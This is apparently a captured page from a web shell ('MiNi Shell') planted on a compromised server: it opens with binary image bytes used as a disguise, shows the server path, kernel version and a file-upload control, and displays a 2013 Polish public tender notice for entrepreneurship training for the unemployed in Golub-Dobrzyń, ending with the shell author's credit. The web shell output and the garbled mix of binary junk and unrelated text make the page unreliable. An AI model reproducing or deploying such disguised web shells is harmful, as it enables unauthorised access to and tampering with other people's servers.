JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/40368-N-2013.html

<p class="kh_header"><b>Golub-Dobrzyń: ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA
ABC PRZEDSIĘBIORCZOŚCI  
DLA BEZROBOTNYCH ZAREJESTROWANYCH
W POWIATOWYM URZĘDZIE PRACY W GOLUBIU-DOBRZYNIU.</b><br>
<b>Numer ogłoszenia: 40368 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Szosa  Rypińska 26, 87-400 Golub-Dobrzyń, woj. kujawsko-pomorskie, tel. 0-56 6835231 do 33 w. 16, faks 0-56 6835230.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA
ABC PRZEDSIĘBIORCZOŚCI  
DLA BEZROBOTNYCH ZAREJESTROWANYCH
W POWIATOWYM URZĘDZIE PRACY W GOLUBIU-DOBRZYNIU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZORGANIZOWANIE I PRZEPROWADZENIE SZKOLENIA
ABC PRZEDSIĘBIORCZOŚCI  
DLA 48 OSÓB BEZROBOTNYCH  W CZTERECH  GRUPACH SZKOLENIOWYCH 

Pierwsza grupa - 12 0S0BOWA PLANOWANY TERMIN MARZEC/KWIECIEŃ 2013 r.
Druga grupa - 12 OSOBOWA PLANOWANY TERMIN KWIECIEŃ 2013 r.
Trzecia grupa - 12 OSOBOWA PLANOWANY TERMIN LIPIEC/SIERPIEŃ 2013 r.
Czwarta grupa - 12 OSOBOWA PLANOWANY TERMIN SIERPIEŃ 2013 r.

ZAREJESTROWANYCH
W POWIATOWYM URZĘDZIE PRACY W GOLUBIU-DOBRZYNIU.
..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dołączony do oferty wpis do rejestru instytucji szkoleniowych wydany przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej

dołączony do oferty wpis do rejestru instytucji szkoleniowych wydany przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - spełnia

brak wpisu do rejestru instytucji szkoleniowych wydanego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dołączenie do oferty opisowej informacji na temat warunków lokalowych i socjalnych (odpowiednia baza teoretyczna i  praktyczna- minimum 12 stanowisk komputerowych/laptopów z dostępem do internetu) zgodnych z przepisami bhp i ppoż oraz załączenie wstępnych umów lub  pisemnych oświadczeń właścicieli baz, w których przewidziane jest szkolenie (zarówno część teoretyczna, jak i praktyczna), do użyczenia pomieszczeń po zawarciu umowy przez PUP z instytucją szkoleniową lub dokumentacji potwierdzającej własność obiektów szkoleniowych - spełnia
brak opisowej informacji na temat warunków lokalowych (odpowiednia baza teoretyczna i  praktyczna) - nie spełnia  
nie załączenie wstępnych umów bądź  pisemnych oświadczeń właścicieli baz, w których przewidziane jest szkolenie (zarówno część teoretyczna, jak i praktyczna), do użyczenia pomieszczeń po zawarciu umowy przez PUP z instytucją szkoleniową lub dokumentacji potwierdzającej własność obiektów szkoleniowych - nie  spełnia
dołączenie do oferty wykazu koniecznego sprzętu (maszyny i urządzenia) jaki zostanie  dostarczony beneficjentom ostatecznym na czas trwania szkolenia z podaniem ilości sztuk  - minimum 12 stanowisk komputerowych/laptopów z dostępem do internetu- spełnia 
brak dołączonego do oferty wykazu koniecznego sprzętu (maszyny i urządzenia) jaki zostanie  dostarczony beneficjentom ostatecznym na czas trwania szkolenia z podaniem ilości sztuk - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dołączenie do oferty wykazu konkretnej kadry dydaktycznej zaangażowanej do prowadzenia zajęć na w/w szkoleniu - dołączając CV wykładowców i informację o prowadzeniu przez nich szkoleń o tej tematyce w okresie ostatnich dwóch lat; - dokumentów potwierdzające kwalifikacje do prowadzenia szkolenia i egzaminowania ( o ile odrębne przepisy nakładają obowiązek posiadania takich uprawnień) oraz pisemną zgodę osób przewidzianych do prowadzenia w/w szkolenia (zarówno części teoretycznej, jak i praktycznej) - spełnia 
brak wykazu konkretnej kadry dydaktycznej zaangażowanej do prowadzenia zajęć na w/w szkoleniu - bądź nie uwzględnienie w wykazie tylko kadry zaangażowanej w przedmiotowe szkolenie i podanie całej kadry dydaktycznej instytucji szkoleniowej - nie spełnia
brak CV wykładowców - nie spełnia
brak dokumentów potwierdzających kwalifikacje do prowadzenia szkolenia, egzaminowania (o ile są wymagane odrębnymi przepisami) - nie spełnia
brak pisemnej zgody osób przewidzianych do prowadzenia w/w szkolenia (zarówno części teoretycznej, jak i praktycznej) - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dołączenie do oferty:
-  programu szkolenia zawierającego nazwę, miejsce i zakres szkolenia- informacji na temat czasu trwania i sposobu organizacji szkolenia zgodnie z oczekiwaniami Zamawiającego  
-  informacji na temat wymagań wstępnych dla uczestników szkolenia 
-  przedstawienie celów szkolenia
- planu nauczania określającego tematy zajęć edukacyjnych oraz ich wymiar z uwzględnieniem części teoretycznej i praktycznej
- opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych
- wykazu literatury oraz środków dydaktycznych
- opisu sposobu sprawdzania efektów szkolenia
- wzoru ankiety służącej do oceny szkolenia
-  wzorów zaświadczeń o ukończeniu szkolenia			
- informacji o zapewnieniu na szkoleniu warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy
- zobowiązania do zamieszczenia informacji o rejestracji szkolenia na stronie internetowej www.inwestycjawkadry.info.pl 
- zobowiązania do zapewnienia uczestnikom szkolenia serwisu kawowego: kawa, herbata,  napoje, susz konferencyjny
będzie oznaczało, iż oferta jest zgodna z przedmiotem zamówienia- oferta spełnia warunki
Dołączone do oferty, złożone pod odpowiedzialnością karną oświadczenie o spełnianiu przez  Wykonawcę warunków wynikających z art. 22 ust 1 Ustawy Prawo zamówień publicznych (tekst jednolity Dz. U. z 2010 Nr 113 poz. 759 ze zm.). Do oferty proszę dołączyć pełne brzmienie art. 22 ust 1 zgodne z aktualnym stanem prawnym.


dołączone do oferty oświadczenie ( w pełnym brzmieniu) złożone pod odpowiedzialnością karną o spełnianiu przez  Wykonawcę warunków wynikających z art. 22 ust 1  Ustawy PZP - spełnia

brak w/w oświadczenia lub oświadczenie w nieaktualnym brzmieniu ( nieaktualny stan prawny), skrócona/niepełna wersja oświadczenia lub oświadczenie złożone bez odpowiedzialności karnej,  nie podpisane, bądź podpisane przez nie  uprawniony podmiot - nie spełnia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - program skzolenia - 10</li>
<li>3 - kwalifikacje i doświadczenie kadry dydaktycznej - 10</li>
<li>4 - baza lokalowa i wyposażenie w pomoce dydaktyczne - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-golub-dobrzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy 
ul. Szosa  Rypińska  26
87-400 Golub-Dobrzyń
tel.: (056)-683-52 31 do 33
fax:(056)-683-52 30
www.pup-golub-dobrzyn.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy 
ul. Szosa  Rypińska  26
87-400 Golub-Dobrzyń

sekretaria pokój nr 13 pierwsze pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> .
Szkolenie organizowane w ramach projektu  Przedsiębiorczość szansą na rozwój regionu kujawsko-pomorskiego realizowanego przez Wojewódzki Urząd Pracy w Toruniu w partnerstwie z wszystkimi 20 powiatowymi urzędami pracy działającymi w województwie kujawsko-pomorskim. Projekt realizowany jest w ramach Działania 6.2 Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia Programu Operacyjnego Kapitał Ludzki. współfinansowanego  z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com